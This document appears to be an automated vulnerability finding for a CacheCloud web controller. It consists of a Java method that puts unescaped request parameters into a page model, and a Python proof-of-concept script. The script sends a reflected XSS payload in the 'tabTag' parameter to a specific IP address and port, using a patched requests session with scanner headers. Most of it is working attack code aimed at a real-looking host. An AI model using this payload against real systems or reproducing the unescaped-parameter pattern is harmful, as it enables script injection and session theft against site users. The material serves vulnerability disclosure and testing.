// src/main/java/com/sohu/cache/web/controller/AppClientDataShowController.java#L62-L89 62: @RequestMapping({"/index"}) 63: public ModelAndView doIndex(HttpServletRequest request, HttpServletResponse response, Model model) { 64: Long appId = NumberUtils.toLong(request.getParameter("appId")); 65: if (appId != null && appId > 0L) { 66: AppDesc appDesc = this.appService.getByAppId(appId); 67: model.addAttribute("appId", appId); 68: model.addAttribute("appDesc", appDesc); 69: model.addAttribute("tabTag", request.getParameter("tabTag")); 70: model.addAttribute("type", request.getParameter("type")); 71: model.addAttribute("searchDate", request.getParameter("searchDate")); 72: model.addAttribute("commandStatisticsStartDate", request.getParameter("commandStatisticsStartDate")); 73: model.addAttribute("commandStatisticsEndDate", request.getParameter("commandStatisticsEndDate")); 74: model.addAttribute("exceptionStartDate", request.getParameter("exceptionStartDate")); 75: model.addAttribute("exceptionEndDate", request.getParameter("exceptionEndDate")); 76: model.addAttribute("valueDistriStartDate", request.getParameter("valueDistriStartDate")); 77: model.addAttribute("valueDistriEndDate", request.getParameter("valueDistriEndDate")); 78: model.addAttribute("costDistriStartDate", request.getParameter("costDistriStartDate")); 79: model.addAttribute("costDistriEndDate", request.getParameter("costDistriEndDate")); 80: model.addAttribute("clientIp", request.getParameter("clientIp")); 81: model.addAttribute("pageNo", request.getParameter("pageNo")); 82: model.addAttribute("firstCommand", request.getParameter("firstCommand")); 83: model.addAttribute("timeDimensionality", request.getParameter("timeDimensionality")); 84: return new ModelAndView("client/appClientIndex"); 85: } else { 86: return new ModelAndView(""); 87: } 88: } 89: 

import requests from requests.sessions import Session class CustomSession(Session): def request( self, method, url, params = None, data = None, headers = None, cookies = None, files = None, auth = None, timeout = None, allow_redirects = True, proxies = None, hooks = None, stream = None, verify = None, cert = None, json = None, ): arg_names = ( 'method', 'url', 'params', 'data', 'headers', 'cookies', 'files', 'auth', 'timeout', 'allow_redirects', 'proxies', 'hooks', 'stream', 'verify', 'cert', 'json' ) local_variables = locals() local_variables = {n: local_variables[n] for n in local_variables if n in arg_names} local_variables['headers'] = local_variables.get('headers') or dict() local_variables['headers'].update({'referer': 'http://34.169.199.145:40101/admin/app/list', 'User-Agent': 'oxpecker', 'accept-language': 'en-US', 'x-requested-with': 'XMLHttpRequest', 'origin': 'http://34.169.199.145:40101', 'upgrade-insecure-requests': '1', 'pragma': 'no-cache', 'cache-control': 'no-cache', 'accept-encoding': 'gzip, deflate'}) return super().request(**{n: local_variables[n] for n in local_variables if n in arg_names}) requests.sessions.Session = CustomSession # ================================== Poc Start =================================== import requests url = 'http://34.169.199.145:40101/client/show/index' malicious_payload = '</SCriPT><SCRiPt>alert("zast-xss")</scRIPt>' params = {'appId': '1', 'tabTag': malicious_payload, 'type': '', 'searchDate': '', 'commandStatisticsStartDate': '', 'commandStatisticsEndDate': '', 'exceptionStartDate': '', 'exceptionEndDate': '', 'valueDistriStartDate': '', 'valueDistriEndDate': '', 'costDistriStartDate': '', 'costDistriEndDate': '', 'clientIp': '', 'pageNo': '', 'firstCommand': '', 'timeDimensionality': ''} response = requests.post(url, params=params, verify=False, allow_redirects=False) print('Status Code:', response.status_code) print('Text:', response.text) # =================================== Poc End ====================================